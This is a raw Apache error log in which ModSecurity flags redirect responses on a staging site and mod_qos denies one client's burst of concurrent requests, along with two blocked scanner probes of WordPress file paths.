[Tue May 26 20:00:03.307849 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6GwAAAC0"]
[Tue May 26 20:00:03.316998 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W1gAAALI"]
[Tue May 26 20:00:03.321927 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6LAAAACQ"]
[Tue May 26 20:00:03.341341 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6MwAAAGc"]
[Tue May 26 20:00:03.345882 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6JwAAAGw"]
[Tue May 26 20:00:03.347850 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6MQAAAFQ"]
[Tue May 26 20:00:03.351058 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W2gAAAPs"]
[Tue May 26 20:00:03.351824 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6IgAAADo"]
[Tue May 26 20:00:03.352519 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6MAAAAAU"]
[Tue May 26 20:00:03.352743 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6LgAAAA8"]
[Tue May 26 20:00:03.353102 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6KwAAABU"]
[Tue May 26 20:00:03.371886 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W2QAAAIU"]
[Tue May 26 20:00:03.385333 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6NAAAADI"]
[Tue May 26 20:00:03.398723 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6MgAAAFg"]
[Tue May 26 20:00:03.402683 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W3QAAAMc"]
[Tue May 26 20:00:03.412326 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XBgAAALg"]
[Tue May 26 20:00:03.412588 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W2wAAANk"]
[Tue May 26 20:00:03.449068 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XEgAAAKg"]
[Tue May 26 20:00:03.763224 2026] [security2:error] [pid 106517:tid 106751] [client 103.163.220.45:27403] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyone/content-index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XhgAAAOk"]
[Tue May 26 20:00:03.866704 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6swAAADo
[Tue May 26 20:00:03.866723 2026] [qos:error] [pid 106517:tid 106739] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWua4ZZc2DoU1lPnP1XkgAAAN0
[Tue May 26 20:00:03.866930 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua4ZZc2DoU1lPnP1XjwAAAL8
[Tue May 26 20:00:03.867862 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6sQAAAAU
[Tue May 26 20:00:03.868470 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6tAAAAH8
[Tue May 26 20:00:03.869925 2026] [qos:error] [pid 106517:tid 106654] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWua4ZZc2DoU1lPnP1XlgAAAIk
[Tue May 26 20:00:03.870273 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWua4ZZc2DoU1lPnP1XlwAAANw
[Tue May 26 20:00:03.874258 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWua2DRMqfxdEDkosz6twAAAFI
[Tue May 26 20:00:03.875315 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWua4ZZc2DoU1lPnP1XnAAAANQ
[Tue May 26 20:00:03.879531 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWua4ZZc2DoU1lPnP1XngAAAIc
[Tue May 26 20:00:04.116491 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6uwAAADM
[Tue May 26 20:00:04.117221 2026] [qos:error] [pid 106517:tid 106709] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1XqgAAAL8
[Tue May 26 20:00:04.118028 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6vAAAAFc
[Tue May 26 20:00:04.120477 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6vQAAADI
[Tue May 26 20:00:04.120482 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6vgAAAF0
[Tue May 26 20:00:04.120851 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6vwAAABg
[Tue May 26 20:00:04.120928 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6wAAAAFg
[Tue May 26 20:00:04.121585 2026] [qos:error] [pid 106517:tid 106654] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1XqwAAAIk
[Tue May 26 20:00:04.122612 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6wQAAACI
[Tue May 26 20:00:04.125874 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6wgAAAGQ
[Tue May 26 20:00:04.268290 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6xwAAADc
[Tue May 26 20:00:04.268414 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6yAAAABs
[Tue May 26 20:00:04.269455 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6yQAAAEA
[Tue May 26 20:00:04.269753 2026] [qos:error] [pid 106517:tid 106649] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1XrgAAAIU
[Tue May 26 20:00:04.270366 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6ygAAAH4
[Tue May 26 20:00:04.270678 2026] [security2:error] [pid 93576:tid 93722] [client 103.163.220.32:63289] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/ssss/src.php"] [unique_id "ahWubGDRMqfxdEDkosz6zAAAAAo"]
[Tue May 26 20:00:04.274535 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuamDRMqfxdEDkosz6VAAAAGU"]
[Tue May 26 20:00:04.275275 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6zwAAACo
[Tue May 26 20:00:04.275523 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz6zQAAADE
[Tue May 26 20:00:04.276854 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XJgAAAMo"]
[Tue May 26 20:00:04.277103 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XFQAAALM"]
[Tue May 26 20:00:04.281230 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XJQAAAJE"]
[Tue May 26 20:00:04.285415 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XCQAAAKA"]
[Tue May 26 20:00:04.287122 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W3gAAAMU"]
[Tue May 26 20:00:04.291841 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6PQAAAA0"]
[Tue May 26 20:00:04.299121 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XIwAAAIw"]
[Tue May 26 20:00:04.302633 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XIAAAAKU"]
[Tue May 26 20:00:04.311350 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XIgAAAPo"]
[Tue May 26 20:00:04.312504 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XCAAAALA"]
[Tue May 26 20:00:04.312533 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XKQAAAO4"]
[Tue May 26 20:00:04.315817 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuamDRMqfxdEDkosz6ZwAAAE0"]
[Tue May 26 20:00:04.326814 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6iAAAAHM"]
[Tue May 26 20:00:04.337504 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XJwAAANA"]
[Tue May 26 20:00:04.339032 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XKwAAAMs"]
[Tue May 26 20:00:04.346474 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XKAAAANE"]
[Tue May 26 20:00:04.348834 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XLAAAALs"]
[Tue May 26 20:00:04.353385 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XOgAAAPE"]
[Tue May 26 20:00:04.353917 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XKgAAAIg"]
[Tue May 26 20:00:04.363738 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XIQAAAQI"]
[Tue May 26 20:00:04.365163 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XOQAAAKE"]
[Tue May 26 20:00:04.376741 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6igAAADY"]
[Tue May 26 20:00:04.381585 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6iwAAAHc"]
[Tue May 26 20:00:04.393205 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XOAAAAOA"]
[Tue May 26 20:00:04.415084 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XJAAAAMY"]
[Tue May 26 20:00:04.421822 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6jgAAAD8"]
[Tue May 26 20:00:04.426236 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XaQAAAM8"]
[Tue May 26 20:00:04.433708 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XaAAAAIo"]
[Tue May 26 20:00:04.519237 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubGDRMqfxdEDkosz7CgAAAFM
[Tue May 26 20:00:04.519569 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWubGDRMqfxdEDkosz7CwAAAHU
[Tue May 26 20:00:04.528870 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X2AAAAPY
[Tue May 26 20:00:04.538225 2026] [qos:error] [pid 106517:tid 106705] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X2QAAALs
[Tue May 26 20:00:04.548504 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7EgAAAEk
[Tue May 26 20:00:04.572336 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7EwAAAD8
[Tue May 26 20:00:04.580979 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7FAAAADI
[Tue May 26 20:00:04.581659 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7FQAAAF8
[Tue May 26 20:00:04.597440 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7FgAAABg
